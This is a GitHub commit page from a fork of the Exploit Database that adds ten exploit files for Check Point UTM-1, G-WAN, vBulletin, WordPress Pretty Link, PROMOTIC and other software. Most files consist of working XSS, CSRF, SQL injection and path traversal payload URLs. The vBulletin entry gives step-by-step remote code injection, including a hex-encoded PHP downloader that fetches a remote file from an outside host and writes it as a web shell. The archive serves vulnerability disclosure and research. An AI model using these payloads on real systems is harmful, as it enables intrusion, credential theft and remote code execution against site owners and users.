forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
10 new exploits
- Loading branch information
Offensive Security
committed
Mar 4, 2015
1 parent
9eca9a0
commit ce06069
Showing
11 changed files
with
214 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,75 @@ | ||
source: http://www.securityfocus.com/bid/50189/info | ||
|
||
Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including: | ||
|
||
1. Multiple cross-site scripting vulnerabilities | ||
2. Multiple HTML-injection vulnerabilities | ||
3. Multiple cross-site request forgery vulnerabilities | ||
4. Multiple URI-redirection vulnerabilities | ||
5. An information-disclosure vulnerability | ||
|
||
An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session. | ||
|
||
Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable. | ||
|
||
Tested on versions 7.5.48x, 8.1.46x and 8.2.2x. | ||
|
||
|
||
1) The following demonstrate the reflective XSS flaws:- | ||
|
||
a) The Ufp.html page is vulnerable to XSS via the url parameter | ||
It works by submitting a malicious url parameter to the ufp.html page | ||
http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1 | ||
|
||
This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x. | ||
|
||
b) The login page is also vulnerable to an XSS via the malicious session cookie | ||
It works by submitting a malicious session cookie to the login page | ||
Cookie: session="><script>alert(1)</script> | ||
|
||
c) An authenticated XSS exists within the diagnostics command | ||
http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);// | ||
(this might need to be submitted twice) | ||
|
||
|
||
2) The following demonstrate the persistent XSS flaws and XSRF flaws:- | ||
|
||
a) The blocked URL warning page is vulnerable to a persistent XSS attack placing any internal users at risk of attack | ||
when the page is displayed. | ||
|
||
First an attacker has to trick the administrator to follow a XSRF attack; the (swsessioncookie) session cookie for | ||
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper). | ||
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E | ||
|
||
Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out. | ||
http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1 | ||
|
||
b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user using the Wi-Fi access | ||
point being at risk. | ||
|
||
First an attacker has to trick the administrator to follow a XSRF attack, the (swsessioncookie) session cookie for | ||
simplicity sake is shown though JavaScript document.cookie can be used to subvert this protection (see paper). | ||
http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on | ||
|
||
Firewall users then visiting the Wi-Fi landing page will then have the attack carried out. | ||
http://www.example.com/pub/hotspot.html?swpreview=1 | ||
|
||
|
||
3) The following demonstrate the (authenticated) offsite redirection flaws:- | ||
|
||
a) Enter the following URL to redirect | ||
http://www.example.com/12?swcaller=http://www.procheckup.com | ||
|
||
b) Enter the following URL and then press back button. | ||
http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com | ||
|
||
4) The following demonstrate the Information disclosure flaws (no authentication needed) | ||
It was found that the /pub/test.html program disclosed information, regarding the patch level used, licensing and the | ||
MAC addresses to unauthenticated users. | ||
|
||
a) On early firmware versions 5.0.82x, 6.0.72x & 7.0.27x 7.5.48x | ||
Just requesting http:// www.example.com/pub/test.html is sufficient | ||
|
||
b) However this no longer worked on versions 8.1.46x & 8.2.26x however adding the URL parameter and a double quote | ||
bypassed this check | ||
https:// www.example.com/pub/test.html?url=" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/50108/info | ||
|
||
G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability. | ||
|
||
Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application. | ||
|
||
G-WAN 2.10.6 is vulnerable; other versions may also be affected. | ||
|
||
while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
source: http://www.securityfocus.com/bid/50168/info | ||
|
||
Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability. | ||
|
||
Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. | ||
|
||
http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
################################################################################################################# | ||
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability | ||
[+] Discovered By: Dariush Nasirpour (Net.Edit0r) | ||
[+] My Homepage: black-hg.org / nasirpour.info | ||
[+] Date: [2015 27 February] | ||
[+] Vendor Homepage: vBulletin.com | ||
[+] Tested on: [vBulletin 4.2.2] | ||
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg ) | ||
################################################################################################################# | ||
Remote Code Injection: | ||
+++++++++++++++++++++++++ | ||
1) You Must Register In The vBulletin http://server/register.php example:[blackhat] | ||
|
||
2) go to your user profile example: [http://server/members/blackhat.html] | ||
|
||
3) post something in visitor message and record post data with live http header | ||
|
||
[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment= | ||
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= | ||
|
||
4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time] | ||
|
||
[Now post this with hackbar:] | ||
|
||
URL: http://server/visitormessage.php?do=message | ||
|
||
[Post data] | ||
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment= | ||
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= | ||
|
||
[And referrer data:] | ||
PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}] | ||
|
||
[Example referrer data:] > upload downloader.php and s.php | ||
PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents( | ||
"downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}] | ||
|
||
5- Open hackbar and tamper it with taper data: | ||
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}] | ||
|
||
and submit request. | ||
|
||
################################################################################################################ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
source: http://www.securityfocus.com/bid/50096/info | ||
|
||
The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. | ||
|
||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E | ||
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E | ||
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E | ||
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E | ||
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
source: http://www.securityfocus.com/bid/50141/info | ||
|
||
Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. | ||
|
||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. | ||
|
||
http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables | ||
|
||
http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273 | ||
|
||
http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/50167/info | ||
|
||
asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. | ||
|
||
An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
source: http://www.securityfocus.com/bid/50195/info | ||
|
||
Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities. | ||
|
||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. | ||
|
||
XSS: | ||
|
||
http://www.example.com/school/starnet/index.php?option=stats&suboption='"</style></script><script>alert(document.cookie)</script> | ||
|
||
http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site='"</style></script><script>alert(document.cookie)</script> | ||
|
||
http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> | ||
|
||
http://www.example.com/school/starnet/index.php?option=modulemanager&module='"</style></script><script>alert(document.cookie)</script> | ||
|
||
SQL Injection: | ||
|
||
http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection] | ||
|
||
http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
source: http://www.securityfocus.com/bid/49997/info | ||
|
||
Microsoft Host Integration Server is prone to a remote denial-of-service vulnerability. | ||
|
||
An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users. | ||
|
||
http://www.exploit-db.com/sploits/36211.zip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/50133/info | ||
|
||
PROMOTIC is prone to multiple security vulnerabilities. | ||
|
||
Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information. | ||
|
||
PROMOTIC 8.1.3 is vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/webdir/..\..\..\..\..\boot.ini |